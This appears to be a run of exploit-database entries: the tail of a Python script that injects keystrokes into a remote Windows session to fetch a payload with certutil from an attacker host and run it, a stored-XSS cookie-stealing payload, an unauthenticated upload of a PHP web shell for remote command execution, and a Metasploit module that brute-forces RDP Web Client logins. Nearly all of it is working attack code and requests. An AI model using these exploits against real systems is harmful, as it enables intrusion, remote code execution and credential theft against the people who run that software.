target.sendto(final_string.decode("hex"),(rhost,port)) sleep(0.2) # Main Execution def main(): print("[+] Saying Hello") Handshake() sleep(2) print("[+] Moving Mouse") MoveMouse() print("[+] Left Clicking (takes a few seconds)") LeftClick() # Left Click is delayed sometimes print("[+] Opening CMD") SendString("cmd.exe") # Start Command Prompt sleep(0.5) SendReturn() sleep(1) print("[+] Retrieving Payload") SendString("certutil.exe -f -urlcache http://" + lhost + "/" + payload + " C:\\Windows\Temp\\" + payload) # Retrieve Payload sleep(0.5) SendReturn() sleep(3) print("[+] Executing") SendString("C:\\Windows\\Temp\\" + payload) # Execute Payload sleep(0.5) SendReturn() sleep(0.5) print("[+] Done! Check your listener?") SendReturn() # Trailing Enter Command Ensures full execution target.close() exit() if __name__=="__main__": main()

# Exploit Title: Vehicle Parking Management System 1.0 - 'catename' Persistent Cross-Site Scripting (XSS) # Date: 2021-02-25 # Exploit Author: Tushar Vaidya # Vendor Homepage: https://www.sourcecodester.com/php/14415/vehicle-parking-management-system-project-phpmysql-full-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/mayuri_k/lagos-parker-fullsource-code.zip # Version: v1.0 # Tested on: Ubuntu *Steps to Reproduce:* 1) Login with Admin Credentials and click on the '*Manage category*' button. 2) Click on the '*Add Categories*' button. 3) Now add the 'Ba1man' in the input field of '*Category*' and intercept it with Burp Suite. 4) Now add the following payload input field of *Category *as a parameter name is *catename* Payload: ba1man"><script>alert(document.cookie)</script> 4) Click On Save 5) Now go to '*Manage category > View Categories*' 5) XSS payload is triggered. *proof-of-concept:* 1) Request: POST /lagos_parker/parker/addcategory.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/lagos_parker/parker/addcategory.php Content-Type: application/x-www-form-urlencoded Content-Length: 82 Connection: close Cookie: PHPSESSID=6432hpio6v07igni4akosvdbmn Upgrade-Insecure-Requests: 1 catename=ba1man"><script>alert(document.cookie)</script>&submit=

# Exploit Title: Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated) # Date: 2021-02-25 # Exploit Author: sml@lacashita.com # Vendor Homepage: https://www.sourcecodester.com/php/11393/employee-records-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employee_records_system.zip # Version: v1.0 # Tested on: Ubuntu 20.04.2 uploadID.php can be used to upload .php files to '/uploads/employees_ids/' without authentication. POC --- 1) Make the following Request changing the "Host:" to your Victim IP. POST /dashboard/uploadID.php HTTP/1.1 Host: 192.168.1.117 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------5825462663702204104870787337 Content-Length: 267 DNT: 1 Connection: close -----------------------------5825462663702204104870787337 Content-Disposition: form-data; name="employee_ID"; filename="cmd2.php" Content-Type: image/png <?php $cmd=$_GET['cmd']; system($cmd); ?> -----------------------------5825462663702204104870787337-- 2) You will get the response with the name of the uploaded file (upload_filename). HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 25 Feb 2021 19:17:55 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 77 {"upload_filename":"Ag1rzKFWTlnCZhL_cmd2.php","selected_filename":"cmd2.php"} 3) Your file will be located in: http://VICTIM_IP/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php 4) In this example, to run commands: http://192.168.1.117/uploads/employees_ids/Ag1rzKFWTlnCZhL_cmd2.php?cmd=whoami

#!/usr/bin/env python3 # -*- coding: utf-8 -*- # standard modules from metasploit import module # extra modules DEPENDENCIES_MISSING = False try: import base64 import itertools import os import requests except ImportError: DEPENDENCIES_MISSING = True # Metasploit Metadata metadata = { 'name': 'Microsoft RDP Web Client Login Enumeration', 'description': ''' Enumerate valid usernames and passwords against a Microsoft RDP Web Client by attempting authentication and performing a timing based check against the provided username. ''', 'authors': [ 'Matthew Dunn' ], 'date': '2020-12-23', 'license': 'MSF_LICENSE', 'references': [ {'type': 'url', 'ref': 'https://raxis.com/blog/rd-web-access-vulnerability'}, ], 'type': 'single_scanner', 'options': { 'targeturi': {'type': 'string', 'description': 'The base path to the RDP Web Client install', 'required': True, 'default': '/RDWeb/Pages/en-US/login.aspx'}, 'rport': {'type': 'port', 'description': 'Port to target', 'required': True, 'default': 443}, 'domain': {'type': 'string', 'description': 'The target AD domain', 'required': False, 'default': None}, 'username': {'type': 'string', 'description': 'The username to verify or path to a file of usernames', 'required': True, 'default': None}, 'password': {'type': 'string', 'description': 'The password to try or path to a file of passwords', 'required': False, 'default': None}, 'timeout': {'type': 'int', 'description': 'Response timeout in milliseconds to consider username invalid', 'required': True, 'default': 1250}, 'enum_domain': {'type': 'bool', 'description': 'Automatically enumerate AD domain using NTLM', 'required': False, 'default': True}, 'verify_service': {'type': 'bool', 'description': 'Verify the service is up before performing login scan', 'required': False, 'default': True}, 'user_agent': {'type': 'string', 'description': 'User Agent string to use, defaults to Firefox', 'required': False, 'default': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} } } def verify_service(rhost, rport, targeturi, timeout, user_agent): """Verify the service is up at the target URI within the specified timeout""" url = f'https://{rhost}:{rport}/{targeturi}' headers = {'Host':rhost, 'User-Agent': user_agent} try: request = requests.get(url, headers=headers, timeout=(timeout / 1000), verify=False, allow_redirects=False) return request.status_code == 200 and 'RDWeb' in request.text except requests.exceptions.Timeout: return False except Exception as exc: module.log(str(exc), level='error') return False def get_ad_domain(rhost, rport, user_agent): """Retrieve the NTLM domain out of a specific challenge/response""" domain_urls = ['aspnet_client', 'Autodiscover', 'ecp', 'EWS', 'OAB', 'Microsoft-Server-ActiveSync', 'PowerShell', 'rpc'] headers = {'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAGAbEdAAAADw==', 'User-Agent': user_agent, 'Host': rhost} session = requests.Session() for url in domain_urls: target_url = f"https://{rhost}:{rport}/{url}" request = session.get(target_url, headers=headers, verify=False) # Decode the provided NTLM Response to strip out the domain name if request.status_code == 401 and 'WWW-Authenticate' in request.headers and \ 'NTLM' in request.headers['WWW-Authenticate']: domain_hash = request.headers['WWW-Authenticate'].split('NTLM ')[1].split(',')[0] domain = base64.b64decode(bytes(domain_hash, 'utf-8')).replace(b'\x00',b'').split(b'\n')[1] domain = domain[domain.index(b'\x0f') + 1:domain.index(b'\x02')].decode('utf-8') module.log(f'Found Domain: {domain}', level='good') return domain module.log('Failed to find Domain', level='error') return None def check_login(rhost, rport, targeturi, domain, username, password, timeout, user_agent): """Check a single login against the RDWeb Client The timeout is used to specify the amount of milliseconds where a response should consider the username invalid.""" url = f'https://{rhost}:{rport}/{targeturi}' body = f'DomainUserName={domain}%5C{username}&UserPass={password}' headers = {'Host':rhost, 'User-Agent': user_agent, 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': f'{len(body)}', 'Origin': f'https://{rhost}'} session = requests.Session() report_data = {'domain':domain, 'address': rhost, 'port': rport, 'protocol': 'tcp', 'service_name':'RDWeb'} try: request = session.post(url, data=body, headers=headers, timeout=(timeout / 1000), verify=False, allow_redirects=False) if request.status_code == 302: module.log(f'Login {domain}\\{username}:{password} is valid!', level='good') module.report_correct_password(username, password, **report_data) elif request.status_code == 200: module.log(f'Password {password} is invalid but {domain}\\{username} is valid! Response received in {request.elapsed.microseconds / 1000} milliseconds', level='good') module.report_valid_username(username, **report_data) else: module.log(f'Received unknown response with status code: {request.status_code}') except requests.exceptions.Timeout: module.log(f'Login {domain}\\{username}:{password} is invalid! No response received in {timeout} milliseconds', level='error') except requests.exceptions.RequestException as exc: module.log('{}'.format(exc), level='error') return def check_logins(rhost, rport, targeturi, domain, usernames, passwords, timeout, user_agent): """Check each username and password combination""" for (username, password) in list(itertools.product(usernames, passwords)): check_login(rhost, rport, targeturi, domain, username.strip(), password.strip(), timeout, user_agent) def run(args): """Run the module, gathering the domain if desired and verifying usernames and passwords""" module.LogHandler.setup(msg_prefix='{} - '.format(args['RHOSTS'])) if DEPENDENCIES_MISSING: module.log('Module dependencies are missing, cannot continue', level='error') return user_agent = args['user_agent'] # Verify the service is up if requested if args['verify_service']: service_verified = verify_service(args['RHOSTS'], args['rport'], args['targeturi'], int(args['timeout']), user_agent) if service_verified: module.log('Service is up, beginning scan...', level='good') else: module.log(f'Service appears to be down, no response in {args["timeout"]} milliseconds', level='error') return # Gather AD Domain either from args or enumeration domain = args['domain'] if 'domain' in args else None if not domain and args['enum_domain']: domain = get_ad_domain(args['RHOSTS'], args['rport'], user_agent) # Verify we have a proper domain if not domain: module.log('Either domain or enum_domain must be set to continue, aborting...', level='error') return # Gather usernames and passwords for enumeration if os.path.isfile(args['username']): with open(args['username'], 'r') as file_contents: usernames = file_contents.readlines() else: usernames = [args['username']] if 'password' in args and os.path.isfile(args['password']): with open(args['password'], 'r') as file_contents: passwords = file_contents.readlines() elif 'password' in args and args['password']: passwords = [args['password']] else: passwords = ['wrong'] # Check each valid login combination check_logins(args['RHOSTS'], args['rport'], args['targeturi'], domain, usernames, passwords, int(args['timeout']), user_agent) if __name__ == '__main__': module.run(metadata, run)